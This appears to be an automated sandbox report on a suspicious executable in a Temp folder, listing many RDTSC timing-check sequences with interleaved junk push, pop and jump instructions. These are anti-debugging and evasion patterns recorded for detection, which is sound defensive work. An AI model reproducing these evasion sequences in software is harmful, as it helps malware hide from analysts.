Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DBE second address: 975DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DC2 second address: 975DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FEE851EFD92h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DDA second address: 975DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEE84E88FCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975DFA second address: 975DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9764C6 second address: 9764CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9764CA second address: 9764D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97C297 second address: 97C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97C29F second address: 97C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 988A3B second address: 988A46 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF3A second address: 98BF5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FEE851EFD90h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF5B second address: 98BF65 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF65 second address: 98BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF6B second address: 98BF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BC61 second address: 98BC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEE851EFD8Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BC82 second address: 98BCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b jc 00007FEE84E88FC6h 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BCA4 second address: 98BCA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 999E21 second address: 999E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FEE84E88FCFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 99EE40 second address: 99EE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jnc 00007FEE851EFD94h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FEE851EFD86h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A4FA4 second address: 9A4FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A524D second address: 9A5263 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FEE851EFD86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jo 00007FEE851EFD86h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A53A9 second address: 9A53AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A53AD second address: 9A53B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A5519 second address: 9A551D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A551D second address: 9A552C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A56AD second address: 9A56BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FEE84E88FE9h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A950F second address: 9A9517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A91B9 second address: 9A91ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD9h 0x00000009 jc 00007FEE84E88FC6h 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007FEE84E88FCEh 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A91ED second address: 9A9209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A9209 second address: 9A920D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9C9B77 second address: 9C9BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEE851EFD99h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FEE851EFD8Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC02D second address: 9CC031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC031 second address: 9CC03B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC03B second address: 9CC040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC040 second address: 9CC049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC049 second address: 9CC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC04F second address: 9CC061 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEE851EFD86h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3445 second address: 9E3451 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEE84E88FC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3451 second address: 9E3457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3457 second address: 9E345D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E345D second address: 9E3461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3461 second address: 9E347B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE84E88FC6h 0x00000008 jng 00007FEE84E88FC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FEE84E88FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E347B second address: 9E347F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CDC second address: 9E3CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEE84E88FC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CE7 second address: 9E3CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CED second address: 9E3CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CF3 second address: 9E3CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CF7 second address: 9E3D0B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FEE84E88FC6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E4191 second address: 9E4199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E4199 second address: 9E41B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E5E23 second address: 9E5E2D instructions: 0x00000000 rdtsc 0x00000002 je 00007FEE851EFD8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E7589 second address: 9E758D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8B3D4A second address: 8B3D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EA173 second address: 9EA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EB843 second address: 9EB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EF1F8 second address: 9EF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0008 second address: 52E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E000C second address: 52E0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0010 second address: 52E0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0016 second address: 52E001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E001C second address: 52E0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0020 second address: 52E00A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FEE84E88FCEh 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FEE84E88FCCh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e call 00007FEE84E88FCEh 0x00000023 pushfd 0x00000024 jmp 00007FEE84E88FD2h 0x00000029 and esi, 0BFDA2F8h 0x0000002f jmp 00007FEE84E88FCBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 mov al, bh 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007FEE84E88FD0h 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00A7 second address: 52E00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00AB second address: 52E00AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00AF second address: 52E00B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00B5 second address: 52E00BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0053 second address: 52D00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEE851EFD94h 0x00000012 xor ax, 3CD8h 0x00000017 jmp 00007FEE851EFD8Bh 0x0000001c popfd 0x0000001d call 00007FEE851EFD98h 0x00000022 push eax 0x00000023 pop edi 0x00000024 pop eax 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEE851EFD98h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300F67 second address: 5300F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0110 second address: 52A0160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEE851EFD8Eh 0x0000000f push eax 0x00000010 jmp 00007FEE851EFD8Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEE851EFD95h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0160 second address: 52A017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A017D second address: 52A0183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0183 second address: 52A0189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0189 second address: 52A018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A018D second address: 52A0191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0191 second address: 52A01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007FEE851EFD98h 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FEE851EFD8Eh 0x0000001a adc esi, 347264B8h 0x00000020 jmp 00007FEE851EFD8Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0218 second address: 52A021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A021E second address: 52A0224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0956 second address: 52C099F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FD8h 0x00000008 sbb ecx, 58398EC8h 0x0000000e jmp 00007FEE84E88FCBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FEE84E88FD8h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C099F second address: 52C09D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FEE851EFD8Dh 0x0000000f adc eax, 1D535E96h 0x00000015 jmp 00007FEE851EFD91h 0x0000001a popfd 0x0000001b mov di, ax 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C09D9 second address: 52C09E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C09E8 second address: 52C09EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C07F9 second address: 52C0829 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FEE84E88FD6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE84E88FCEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0829 second address: 52C08B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEE851EFD91h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007FEE851EFD98h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FEE851EFD93h 0x0000001d sub ah, 0000006Eh 0x00000020 jmp 00007FEE851EFD99h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FEE851EFD98h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08B0 second address: 52C08BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08BF second address: 52C08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08C5 second address: 52C08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0575 second address: 52C057A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0367 second address: 52D03CC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FD5h 0x00000008 add ax, B696h 0x0000000d jmp 00007FEE84E88FD1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FEE84E88FCEh 0x0000001c push eax 0x0000001d jmp 00007FEE84E88FCBh 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FEE84E88FD5h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D03CC second address: 52D040B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FEE851EFD8Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEE851EFD97h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D040B second address: 52D0412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
